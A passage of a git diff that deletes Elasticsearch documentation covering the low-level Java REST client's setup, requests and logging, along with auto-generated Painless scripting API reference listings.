--------------------------------------------------- - -In the same way it is also possible to customize the `sniffRequestTimeout`, -which defaults to one second. That is the `timeout` parameter provided as a -query string parameter when calling the Nodes Info api, so that when the -timeout expires on the server side, a valid response is still returned -although it may contain only a subset of the nodes that are part of the -cluster, the ones that have responded until then. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniff-request-timeout] --------------------------------------------------- - -Also, a custom `NodesSniffer` implementation can be provided for advanced -use cases that may require fetching the nodes from external sources rather -than from Elasticsearch: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[custom-nodes-sniffer] --------------------------------------------------- -<1> Fetch the hosts from the external source diff --git a/docs/java-rest/low-level/usage.asciidoc b/docs/java-rest/low-level/usage.asciidoc deleted file mode 100644 index 68b91e06d6f..00000000000 --- a/docs/java-rest/low-level/usage.asciidoc +++ /dev/null @@ -1,422 +0,0 @@ -[[java-rest-low-usage]] -== Getting started - -This section describes how to get started with the low-level REST client from -getting the artifact to using it in an application. - -[[java-rest-low-javadoc]] -=== Javadoc - -The javadoc for the low level REST client can be found at {rest-client-javadoc}/index.html. - -[[java-rest-low-usage-maven]] -=== Maven Repository - -The low-level Java REST client is hosted on -https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.elasticsearch.client%22[Maven -Central]. The minimum Java version required is `1.8`. - -The low-level REST client is subject to the same release cycle as -Elasticsearch. Replace the version with the desired client version, first -released with `5.0.0-alpha4`. There is no relation between the client version -and the Elasticsearch version that the client can communicate with. The -low-level REST client is compatible with all Elasticsearch versions. - -If you are looking for a SNAPSHOT version, the Elastic Maven Snapshot repository is available -at https://snapshots.elastic.co/maven/. - -[[java-rest-low-usage-maven-maven]] -==== Maven configuration - -Here is how you can configure the dependency using maven as a dependency manager. -Add the following to your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.elasticsearch.client - elasticsearch-rest-client - {version} - --------------------------------------------------- - -[[java-rest-low-usage-maven-gradle]] -==== Gradle configuration - -Here is how you can configure the dependency using gradle as a dependency manager. -Add the following to your `build.gradle` file: - -["source","groovy",subs="attributes"] --------------------------------------------------- -dependencies { - compile 'org.elasticsearch.client:elasticsearch-rest-client:{version}' -} --------------------------------------------------- - -[[java-rest-low-usage-dependencies]] -=== Dependencies - -The low-level Java REST client internally uses the -https://hc.apache.org/httpcomponents-asyncclient-dev/[Apache Http Async Client] - to send http requests. It depends on the following artifacts, namely the async - http client and its own transitive dependencies: - -- org.apache.httpcomponents:httpasyncclient -- org.apache.httpcomponents:httpcore-nio -- org.apache.httpcomponents:httpclient -- org.apache.httpcomponents:httpcore -- commons-codec:commons-codec -- commons-logging:commons-logging - -[[java-rest-low-usage-shading]] -=== Shading - -In order to avoid version conflicts, the dependencies can be shaded and packaged -within the client in a single JAR file (sometimes called an "uber JAR" or "fat -JAR"). Shading a dependency consists of taking its content (resources files and -Java class files) and renaming some of its packages before putting them in the -same JAR file as the low-level Java REST client. Shading a JAR can be -accomplished by 3rd-party plugins for Gradle and Maven. - -Be advised that shading a JAR also has implications. Shading the Commons Logging -layer, for instance, means that 3rd-party logging backends need to be shaded as -well. - -[[java-rest-low-usage-shading-maven]] -==== Maven configuration - -Here is a configuration using the Maven -https://maven.apache.org/plugins/maven-shade-plugin/index.html[Shade] -plugin. Add the following to your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - - - org.apache.maven.plugins - maven-shade-plugin - 3.1.0 - - - package - shade - - - - org.apache.http - hidden.org.apache.http - - - org.apache.logging - hidden.org.apache.logging - - - org.apache.commons.codec - hidden.org.apache.commons.codec - - - org.apache.commons.logging - hidden.org.apache.commons.logging - - - - - - - - --------------------------------------------------- - -[[java-rest-low-usage-shading-gradle]] -==== Gradle configuration - -Here is a configuration using the Gradle -https://github.com/johnrengelman/shadow[ShadowJar] plugin. Add the following to -your `build.gradle` file: - -["source","groovy",subs="attributes"] --------------------------------------------------- -shadowJar { - relocate 'org.apache.http', 'hidden.org.apache.http' - relocate 'org.apache.logging', 'hidden.org.apache.logging' - relocate 'org.apache.commons.codec', 'hidden.org.apache.commons.codec' - relocate 'org.apache.commons.logging', 'hidden.org.apache.commons.logging' -} --------------------------------------------------- - -[[java-rest-low-usage-initialization]] -=== Initialization - -A `RestClient` instance can be built through the corresponding -`RestClientBuilder` class, created via `RestClient#builder(HttpHost...)` -static method. The only required argument is one or more hosts that the -client will communicate with, provided as instances of -https://hc.apache.org/httpcomponents-core-ga/httpcore/apidocs/org/apache/http/HttpHost.html[HttpHost] - as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init] --------------------------------------------------- - -The `RestClient` class is thread-safe and ideally has the same lifecycle as -the application that uses it. It is important that it gets closed when no -longer needed so that all the resources used by it get properly released, -as well as the underlying http client instance and its threads: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-close] --------------------------------------------------- - -`RestClientBuilder` also allows to optionally set the following configuration -parameters while building the `RestClient` instance: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-default-headers] --------------------------------------------------- -<1> Set the default headers that need to be sent with each request, to -prevent having to specify them with each single request - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-failure-listener] --------------------------------------------------- -<1> Set a listener that gets notified every time a node fails, in case actions -need to be taken. Used internally when sniffing on failure is enabled. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-node-selector] --------------------------------------------------- -<1> Set the node selector to be used to filter the nodes the client will send -requests to among the ones that are set to the client itself. This is useful -for instance to prevent sending requests to dedicated master nodes when -sniffing is enabled. By default the client sends requests to every configured -node. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-request-config-callback] --------------------------------------------------- -<1> Set a callback that allows to modify the default request configuration -(e.g. request timeouts, authentication, or anything that the -https://hc.apache.org/httpcomponents-client-ga/httpclient/apidocs/org/apache/http/client/config/RequestConfig.Builder.html[`org.apache.http.client.config.RequestConfig.Builder`] - allows to set) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-client-config-callback] --------------------------------------------------- -<1> Set a callback that allows to modify the http client configuration -(e.g. encrypted communication over ssl, or anything that the -https://hc.apache.org/httpcomponents-asyncclient-dev/httpasyncclient/apidocs/org/apache/http/impl/nio/client/HttpAsyncClientBuilder.html[`org.apache.http.impl.nio.client.HttpAsyncClientBuilder`] - allows to set) - - -[[java-rest-low-usage-requests]] -=== Performing requests - -Once the `RestClient` has been created, requests can be sent by calling either -`performRequest` or `performRequestAsync`. `performRequest` is synchronous and -will block the calling thread and return the `Response` when the request is -successful or throw an exception if it fails. `performRequestAsync` is -asynchronous and accepts a `ResponseListener` argument that it calls with a -`Response` when the request is successful or with an `Exception` if it fails. - -This is synchronous: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-sync] --------------------------------------------------- -<1> The HTTP method (`GET`, `POST`, `HEAD`, etc) -<2> The endpoint on the server - -And this is asynchronous: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-async] --------------------------------------------------- -<1> The HTTP method (`GET`, `POST`, `HEAD`, etc) -<2> The endpoint on the server -<3> Handle the response -<4> Handle the failure - -You can add request parameters to the request object: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-parameters] --------------------------------------------------- - -You can set the body of the request to any `HttpEntity`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-body] --------------------------------------------------- - -IMPORTANT: The `ContentType` specified for the `HttpEntity` is important -because it will be used to set the `Content-Type` header so that Elasticsearch -can properly parse the content. - -You can also set it to a `String` which will default to -a `ContentType` of `application/json`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-body-shorter] --------------------------------------------------- - -[[java-rest-low-usage-request-options]] -==== RequestOptions - -The `RequestOptions` class holds parts of the request that should be shared -between many requests in the same application. You can make a singleton -instance and share it between all requests: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-options-singleton] --------------------------------------------------- -<1> Add any headers needed by all requests. -<2> Customize the response consumer. - -`addHeader` is for headers that are required for authorization or to work with -a proxy in front of Elasticsearch. There is no need to set the `Content-Type` -header because the client will automatically set that from the `HttpEntity` -attached to the request. - -You can set the `NodeSelector` which controls which nodes will receive -requests. `NodeSelector.SKIP_DEDICATED_MASTERS` is a good choice. - -You can also customize the response consumer used to buffer the asynchronous -responses. The default consumer will buffer up to 100MB of response on the -JVM heap. If the response is larger then the request will fail. You could, -for example, lower the maximum size which might be useful if you are running -in a heap constrained environment like the example above. - -Once you've created the singleton you can use it when making requests: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-options-set-singleton] --------------------------------------------------- - -You can also customize these options on a per request basis. For example, this -adds an extra header: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-options-customize-header] --------------------------------------------------- - -==== Multiple parallel asynchronous actions - -The client is quite happy to execute many actions in parallel. The following -example indexes many documents in parallel. In a real world scenario you'd -probably want to use the `_bulk` API instead, but the example is illustrative. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-async-example] --------------------------------------------------- -<1> Process the returned response -<2> Handle the returned exception, due to communication error or a response -with status code that indicates an error - -==== Cancelling asynchronous requests - -The `performRequestAsync` method returns a `Cancellable` that exposes a single -public method called `cancel`. Such method can be called to cancel the on-going -request. Cancelling a request will result in aborting the http request through -the underlying http client. On the server side, this does not automatically -translate to the execution of that request being cancelled, which needs to be -specifically implemented in the API itself. - -The use of the `Cancellable` instance is optional and you can safely ignore this -if you don't need it. A typical usecase for this would be using this together with -frameworks like Rx Java or the Kotlin's `suspendCancellableCoRoutine`. Cancelling -no longer needed requests is a good way to avoid putting unnecessary -load on Elasticsearch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-async-cancel] --------------------------------------------------- -<1> Process the returned response, in case it was ready before the request got cancelled -<2> Handle the returned exception, which will most likely be a `CancellationException` as the request got cancelled - -[[java-rest-low-usage-responses]] -=== Reading responses - -The `Response` object, either returned by the synchronous `performRequest` methods or -received as an argument in `ResponseListener#onSuccess(Response)`, wraps the -response object returned by the http client and exposes some additional information. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-response2] --------------------------------------------------- -<1> Information about the performed request -<2> The host that returned the response -<3> The response status line, from which you can for instance retrieve the status code -<4> The response headers, which can also be retrieved by name though `getHeader(String)` -<5> The response body enclosed in an https://hc.apache.org/httpcomponents-core-ga/httpcore/apidocs/org/apache/http/HttpEntity.html[`org.apache.http.HttpEntity`] - object - -When performing a request, an exception is thrown (or received as an argument - in `ResponseListener#onFailure(Exception)` in the following scenarios: - -`IOException`:: communication problem (e.g. SocketTimeoutException) -`ResponseException`:: a response was returned, but its status code indicated -an error (not `2xx`). A `ResponseException` originates from a valid -http response, hence it exposes its corresponding `Response` object which gives -access to the returned response. - -NOTE: A `ResponseException` is **not** thrown for `HEAD` requests that return -a `404` status code because it is an expected `HEAD` response that simply -denotes that the resource is not found. All other HTTP methods (e.g., `GET`) -throw a `ResponseException` for `404` responses unless the `ignore` parameter -contains `404`. `ignore` is a special client parameter that doesn't get sent -to Elasticsearch and contains a comma separated list of error status codes. -It allows to control whether some error status code should be treated as an -expected response rather than as an exception. This is useful for instance -with the get api as it can return `404` when the document is missing, in which -case the response body will not contain an error but rather the usual get api -response, just without the document as it was not found. - -Note that the low-level client doesn't expose any helper for json marshalling -and un-marshalling. Users are free to use the library that they prefer for that -purpose. - -The underlying Apache Async Http Client ships with different -https://hc.apache.org/httpcomponents-core-ga/httpcore/apidocs/org/apache/http/HttpEntity.html[`org.apache.http.HttpEntity`] - implementations that allow to provide the request body in different formats -(stream, byte array, string etc.). As for reading the response body, the -`HttpEntity#getContent` method comes handy which returns an `InputStream` -reading from the previously buffered response body. As an alternative, it is -possible to provide a custom -https://hc.apache.org/httpcomponents-core-ga/httpcore-nio/apidocs/org/apache/http/nio/protocol/HttpAsyncResponseConsumer.html[`org.apache.http.nio.protocol.HttpAsyncResponseConsumer`] - that controls how bytes are read and buffered. - -[[java-rest-low-usage-logging]] -=== Logging - -The Java REST client uses the same logging library that the Apache Async Http -Client uses: https://commons.apache.org/proper/commons-logging/[Apache Commons Logging], - which comes with support for a number of popular logging implementations. The -java packages to enable logging for are `org.elasticsearch.client` for the -client itself and `org.elasticsearch.client.sniffer` for the sniffer. - -The request tracer logging can also be enabled to log every request and -corresponding response in curl format. That comes handy when debugging, for -instance in case a request needs to be manually executed to check whether it -still yields the same response as it did. Enable trace logging for the `tracer` -package to have such log lines printed out. Do note that this type of logging is -expensive and should not be enabled at all times in production environments, -but rather temporarily used only when needed. diff --git a/docs/java-rest/overview.asciidoc b/docs/java-rest/overview.asciidoc deleted file mode 100644 index 4539406e4c3..00000000000 --- a/docs/java-rest/overview.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[java-rest-overview]] -== Overview - -The Java REST Client comes in 2 flavors: - -* <>: the official low-level client for Elasticsearch. -It allows to communicate with an Elasticsearch cluster through http. -Leaves requests marshalling and responses un-marshalling to users. -It is compatible with all Elasticsearch versions. - -* <>: the official high-level client for Elasticsearch. -Based on the low-level client, it exposes API specific methods and takes care -of requests marshalling and responses un-marshalling. \ No newline at end of file diff --git a/docs/java-rest/redirects.asciidoc b/docs/java-rest/redirects.asciidoc deleted file mode 100644 index a077102b405..00000000000 --- a/docs/java-rest/redirects.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ -["appendix",role="exclude",id="redirects"] -= Deleted pages - -The following pages have moved or been deleted. - -[role="exclude",id="_data_frame_transform_apis"] -=== {transform-cap} APIs - -See <>. - -[role="exclude",id="java-rest-high-dataframe-get-data-frame-transform"] -=== Get {transform} API - -See <>. - -[role="exclude",id="java-rest-high-dataframe-get-data-frame-transform-stats"] -=== Get {transform} stats API - -See <>. - -[role="exclude",id="java-rest-high-dataframe-put-data-frame-transform"] -=== Put {transform} API - -See <>. - -[role="exclude",id="java-rest-high-dataframe-update-data-frame-transform"] -=== Update {transform} API - -See <>. - -[role="exclude",id="java-rest-high-dataframe-delete-data-frame-transform"] -=== Delete {transform} API - -See <>. - -[role="exclude",id="java-rest-high-dataframe-preview-data-frame-transform"] -=== Preview {transform} API - -See <>. - -[role="exclude",id="java-rest-high-dataframe-start-data-frame-transform"] -=== Start {transform} API - -See <>. - -[role="exclude",id="java-rest-high-dataframe-stop-data-frame-transform"] -=== Stop {transform} API - -See <>. diff --git a/docs/painless/index.asciidoc b/docs/painless/index.asciidoc deleted file mode 100644 index c41899bbd98..00000000000 --- a/docs/painless/index.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[painless]] -= Painless Scripting Language - -include::../Versions.asciidoc[] - -include::painless-guide.asciidoc[] - -include::painless-lang-spec.asciidoc[] - -include::painless-contexts.asciidoc[] - -include::painless-api-reference.asciidoc[] \ No newline at end of file diff --git a/docs/painless/painless-api-reference.asciidoc b/docs/painless/painless-api-reference.asciidoc deleted file mode 100644 index 4ae770266c2..00000000000 --- a/docs/painless/painless-api-reference.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[painless-api-reference]] -== Painless API Reference - -Painless has a strict list of allowed methods and classes per context to -ensure all Painless scripts are secure. Most of these methods are -exposed directly from the Java Runtime Environment (JRE) while others -are part of Elasticsearch or Painless itself. Below is a list of the available -APIs per context. The shared API is available to all contexts, while the -specialized API available differs between contexts. - -include::painless-api-reference/index.asciidoc[] diff --git a/docs/painless/painless-api-reference/index.asciidoc b/docs/painless/painless-api-reference/index.asciidoc deleted file mode 100644 index d6984656103..00000000000 --- a/docs/painless/painless-api-reference/index.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -// This file is auto-generated. Do not edit. - -[cols="<3,^3,^3"] -|==== -|Aggregation Selector | <> | <> -|Aggs | <> | <> -|Aggs Combine | <> | <> -|Aggs Init | <> | <> -|Aggs Map | <> | <> -|Aggs Reduce | <> | <> -|Analysis | <> | <> -|Bucket Aggregation | <> | <> -|Field | <> | <> -|Filter | <> | <> -|Ingest | <> | <> -|Interval | <> | <> -|Moving Function | <> | <> -|Number Sort | <> | <> -|Painless Test | <> | <> -|Processor Conditional | <> | <> -|Score | <> | <> -|Script Heuristic | <> | <> -|Similarity | <> | <> -|Similarity Weight | <> | <> -|String Sort | <> | <> -|Template | <> | <> -|Terms Set | <> | <> -|Update | <> | <> -|Watcher Condition | <> | <> -|Watcher Transform | <> | <> -|Xpack Template | <> | <> -|==== - -include::painless-api-reference-shared/index.asciidoc[] -include::painless-api-reference-aggregation-selector/index.asciidoc[] -include::painless-api-reference-aggs/index.asciidoc[] -include::painless-api-reference-aggs-combine/index.asciidoc[] -include::painless-api-reference-aggs-init/index.asciidoc[] -include::painless-api-reference-aggs-map/index.asciidoc[] -include::painless-api-reference-aggs-reduce/index.asciidoc[] -include::painless-api-reference-analysis/index.asciidoc[] -include::painless-api-reference-bucket-aggregation/index.asciidoc[] -include::painless-api-reference-field/index.asciidoc[] -include::painless-api-reference-filter/index.asciidoc[] -include::painless-api-reference-ingest/index.asciidoc[] -include::painless-api-reference-interval/index.asciidoc[] -include::painless-api-reference-moving-function/index.asciidoc[] -include::painless-api-reference-number-sort/index.asciidoc[] -include::painless-api-reference-painless-test/index.asciidoc[] -include::painless-api-reference-processor-conditional/index.asciidoc[] -include::painless-api-reference-score/index.asciidoc[] -include::painless-api-reference-script-heuristic/index.asciidoc[] -include::painless-api-reference-similarity/index.asciidoc[] -include::painless-api-reference-similarity-weight/index.asciidoc[] -include::painless-api-reference-string-sort/index.asciidoc[] -include::painless-api-reference-template/index.asciidoc[] -include::painless-api-reference-terms-set/index.asciidoc[] -include::painless-api-reference-update/index.asciidoc[] -include::painless-api-reference-watcher-condition/index.asciidoc[] -include::painless-api-reference-watcher-transform/index.asciidoc[] -include::painless-api-reference-xpack-template/index.asciidoc[] diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/index.asciidoc deleted file mode 100644 index 3a82dc9536a..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggregation-selector]] -=== Aggregation Selector API - -The following specialized API is available in the Aggregation Selector context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/packages.asciidoc deleted file mode 100644 index bf87efc3123..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggregation-selector/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggregation-selector-java-lang"] -=== Aggregation Selector API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggregation-selector-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-aggregation-selector-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Aggregation Selector API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggregation-selector-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-aggregation-selector-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Aggregation Selector API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggregation-selector-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-aggregation-selector-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/index.asciidoc deleted file mode 100644 index 420797f80ed..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs-combine]] -=== Aggs Combine API - -The following specialized API is available in the Aggs Combine context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/packages.asciidoc deleted file mode 100644 index 273ff65e45d..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-combine/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggs-combine-java-lang"] -=== Aggs Combine API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggs-combine-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean 